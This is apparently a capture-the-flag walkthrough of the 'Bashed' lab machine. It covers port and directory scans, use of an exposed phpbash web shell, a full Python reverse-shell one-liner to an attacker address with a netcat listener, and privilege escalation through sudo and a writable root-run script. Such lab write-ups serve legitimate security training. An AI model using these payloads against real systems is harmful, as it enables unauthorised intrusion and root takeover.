Ping
ping 10.10.10.68
Nmap Default Scan
nmap 10.10.10.68 -oN dnmap
We have only one open Port.
All port Scan
nmap 10.10.10.68 -sC -sV -p- --open -T5 -oN anmap
No other ports found.
On Port 80
Gobuster Scan
gobuster dir -u http://10.10.10.68// -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x php,html,txt,bak,conf -s 200,204,301,302,307,403 -k --status-codes "" -o gobuster.txt
/dev has some php files
got a semi-Interactive shell from phpbash.min.php
Will get Proper Reverse shell, So will check for nc any python
which nc
which python
We can get reverse shell using bot nc and python, I’m going with python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.41",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'
rlwrap nc -nvlp 443
got it…!
Will upgrade the shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
Got the user.txt in home directory of user arrexel
Will jump to Privilege Escalation…!
Will check sudo permissions
sudo -l
So we can switch to scriptmanager
sudo -u scriptmanager -i
So the script manager as full and root access to scripts directory
ls -la
lets navigate to scripts directory and modify the mod or add new code for reverse shell as root.
Then execute the code to get reverse shell as root
python test.py
rlwrap nc -nvlp 443
Got root.txt in root directory
Done with bashed…:)